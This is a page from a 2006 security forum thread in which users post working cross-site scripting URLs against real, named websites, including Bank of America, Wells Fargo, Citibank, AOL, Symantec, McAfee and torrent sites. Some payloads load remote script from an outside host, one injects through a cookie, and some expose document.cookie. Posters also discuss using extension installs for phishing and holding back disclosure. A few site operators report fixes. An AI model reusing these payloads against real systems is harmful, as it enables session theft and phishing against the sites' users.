Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...1718192021222324252627...LastNext
Current Page: 22 of 65
Re: So it begins
Posted by: rsnake
Date: October 23, 2006 10:12PM

Style.com: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.style.com/services/newsletters&toolkit.application=newsletter&toolkit.applicationId=&formName=shortForm&partnerCode=&sourceCode=&newsletterAndVersions=newsletter.17&newsletterAndVersions=newsletter.35&email=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&IMAGE.x=0&IMAGE.y=0

Yah, she owns. Hahah...

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 23, 2006 10:13PM

I really recommend against dating him, girl: http://dontdatehimgirl.com/search/search_results.asp?search=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&Submit=Search&search_options=+OR+

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: October 23, 2006 10:27PM

btw, do you know the answer to the question i asked on jeremiah grossman's blog? i haven't messed around much with extensions.. nor firfox's security practices for em

Quote

well.. i found one on addons.mozilla.org .. and persistent. But, don't the victims still need to press the install button for them to be downloaded..? Also, the .xpi files look to be hosted on releases.mozilla.org


So it can definitely be used for phishing if they can be convinced to click install.. but i'm not sure about an automatic way

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 23, 2006 10:29PM

I'm not sure if doing something like a META refresh to a data directive might do it since it's on the same domain or not. I've done some tests and I was able to get over 3k into a single data directive, which should be enough to load an .xpi file. I think it's doable, but I'm not sure if it will cause a popup or not, I haven't gone that far into testing.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: October 23, 2006 10:42PM

well i was more curious about the whether or not theres a way to bypass the 'Install' button before the extensions will download

i'll mess with it more when i find the time.. in the meantime i think i'll hold off on disclosing that XSS >.>

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: nrg
Date: October 24, 2006 01:12PM

i don't think you can do a silent install without some firefox install, because if xpi from allowed list popup an install question.

--
http://chasenet.org/home/

Options: ReplyQuote
Re: So it begins
Posted by: dveditz
Date: October 24, 2006 01:49PM

The www.mozilla.com and doctor.mozilla.org ones appear to have been fixed last night.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: October 24, 2006 02:14PM

well good job to whatever mozilla dev reads this thread.. prompt fix

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: October 24, 2006 02:32PM

http://www.rsnake.com/results.jsp?searchTerm=all%20his%20midget%20grannie%20porn%3Cscript%3Ealert%28%22zOMG+maluc+just+owned+RSnake.%21%22%29%3C%2Fscript%3E&x=0&y=0&domainName=rsnake.com&w=false

>.>
<.<

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: id
Date: October 24, 2006 03:02PM

oh if he only owned it ;)

-id

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 24, 2006 04:20PM

Ugh, I hate the fact I don't own that domain... I'm not sure what I'd even do with it, but it sure sucks. That and hackers.com (they don't even respond to my bids).

Anyway, yes, nice quick fix from Mozilla! I think we have a few people very close to Mozilla reading the blog and this list. We get traffic from pretty much everywhere these days.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: October 24, 2006 08:39PM

http://eco.netvibes.com/?type=all&q=XSS%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: SkullyFM
Date: October 25, 2006 10:59AM

maluc Wrote:
-------------------------------------------------------
> http://eco.netvibes.com/?type=all&q=XSS%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E

This has been fixed... thanks for pointing it out..



Edited 1 time(s). Last edit at 10/25/2006 10:59AM by SkullyFM.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: October 25, 2006 12:49PM

and thanks for fixing it promptly ^^.. good job

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: unsticky
Date: October 25, 2006 04:57PM

[www.mymms.com]
[www2.mms.com]

In the spirit of halloween, I thought I'd check out some of the sites on the candy wrappers...

Edit:
Unrelated to Halloween... Except for the whole food alergies thing...
[www.cfsan.fda.gov]



Edited 2 time(s). Last edit at 10/25/2006 05:16PM by unsticky.

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 26, 2006 11:17AM

Happy Halloween to you too, Unsticky :)

http://www.buy.com/retail/searchresults.asp?querytype=home&qu=%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&qxt=home&display=&dclksa=1

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: unsticky
Date: October 26, 2006 12:55PM

Why thank you, rsnake

[shopping.aol.com]



Edited 1 time(s). Last edit at 10/26/2006 01:03PM by unsticky.

Options: ReplyQuote
Re: So it begins
Posted by: fogez
Date: October 26, 2006 03:55PM

I was looking for a granny...

http://www.perfectmatch.com/hp/pepper/Pepper14.asp?v=2&rt=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E%3C!--

Options: ReplyQuote
Re: So it begins
Posted by: unsticky
Date: October 26, 2006 04:46PM

[militaryhistory.about.com]
[search.about.com]

It appears that the offsite.htm xss vuln isnt restricted to just the militaryhistory subdomain, I beleive it'll work with just about any of them. Also, the sdn varible can be used to redirect the user to any site, which I posted in the Redirects thread, as well.



Edited 2 time(s). Last edit at 10/26/2006 04:58PM by unsticky.

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 26, 2006 10:28PM

http://searchg.symantec.com/search?q=';alert(%22XSS%22);//&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=gbh&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 26, 2006 10:46PM

McAfee: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://us.mcafee.com/virusInfo/default.asp&SearchType=2&searchString=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 26, 2006 11:22PM

Slight variation on Maluc's script where a semicolon wasn't allowed so you have to create two unique style tags: http://www.bankofamerica.com/state.cgi?section=generic&update=&cookiecheck=yes&question_box=%22style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss')%22style=%22xx:expression(alert('XSS')%29&url=search/&ui_mode=question

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: unsticky
Date: October 27, 2006 12:08AM

[aiw2.uspto.gov]
[appft.uspto.gov]

[messageboards.aol.com]
[peopleconnection.aol.com]
[my.screenname.aol.com]
[www.aol.com] -- Header Splitting
[us.video.aol.com]
[account.login.aol.com]
[about.aol.com] -- Almost all the AOL subdomains are vuln to this one

[www.styledash.com] -- One of AOL's sites, I wasn't in the market for fashion tips...

rsnake, I hope you don't mind me using your s.js on the patent office's site... dunno if you appriciate such things showing up in logs and all... And my appologies for spending so much time on aol.com :X



Edited 12 time(s). Last edit at 10/27/2006 01:30AM by unsticky.

Options: ReplyQuote
Re: So it begins
Posted by: fogez
Date: October 27, 2006 07:32AM

Create a boarding pass for NWA

http://www.dubfire.net/boarding_pass/nwa.php?fname=Osama&lname=Bin+Laden&seatnum=07-C&gatenum=A10&date=27OCT2006&flight=7305&gatenum=A10&deptcity=Indianapolis%2C+IN%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&destcity=Washington+-+Reagan+Nat%27l&depttime=10%3A50AM&desttime=1%3A30PM&class=Coach+Class

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: October 27, 2006 08:20AM

how about we start on bank sites.. i'll continue where rsnake left off

https://www.wellsfargo.com/app2k/prefill_invoke.jhtml?event=BeginAppsFlow&context=ApplicationViewAll&productsetid=APP2K&productcode=CH%22><script>alert(%22Happy%20Halloween%22)</script><x

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: October 27, 2006 08:52AM

okie, well i'm not sure what can be done with this one.. but it's interesting as i don't see them very often. it's a cookie XSS .. using the cookie info:

Site: web.da-us.citibank.com
Cookie Name: username
Content: 1|asdf"><script>alert("XSS")</script><x

page that's XSS'ed: https://web.da-us.citibank.com/cgi-bin/citifi/scripts/login2/login.jsp?M=S

Can you forge cookies remotely using response splitting? Or perhaps with flash? i.e. is it exploitable for CSRF. At the very least, i suppose finding another XSS that's reflective can use this one to make a pseudo-persistent XSS, for the life of the cookie..

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: fogez
Date: October 27, 2006 09:06AM

Searching for granny downloads

http://www.torrentspy.com/uploadtorrent.asp?TN=asdf%22%3E%3Cscript%3Ealert('xss')%3C/script%3E%3C%22&lngMainCat=&lngSubCat=&ts=
http://isohunt.com/torrents/?ihq=%3C%2Ftitle%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E%3Ctitle%3E
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.torrentportal.com/torrents-upload.php&name=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E - Torrentportal
http://tr.searching.com/search.php?_br=tr&search=&words=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&cid=&type=2&exclude=&sizemin=&sizemax=&from_m=10&from_d=27&from_y=2001&to_m=10&to_d=27&to_y=2006&orderby=relevance&asc=0 - torrentreactor
http://btjunkie.org/search?q=%3C%2Ftitle%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E%3Ctitle%3E
http://www.mininova.org/search/?search=asdf%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3Cscript%3E

Options: ReplyQuote
Re: So it begins
Posted by: unsticky
Date: October 27, 2006 11:25AM

[www.commerceonline.com]



Edited 1 time(s). Last edit at 10/27/2006 06:27PM by unsticky.

Options: ReplyQuote
Re: So it begins
Posted by: fogez
Date: October 27, 2006 11:42AM

http://www.communitybanks.com/index.cfm?pag=23&searchstring=%3Cbody+onload%3Dalert%28%27xss%27%29%3E&submit.x=0&submit.y=0

Options: ReplyQuote
Re: So it begins
Posted by: fogez
Date: October 27, 2006 01:41PM

http://www.cio-today.com/fullpage/fullpage.xhtml?dest=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

Options: ReplyQuote
Pages: PreviousFirst...1718192021222324252627...LastNext
Current Page: 22 of 65


Sorry, only registered users may post in this forum.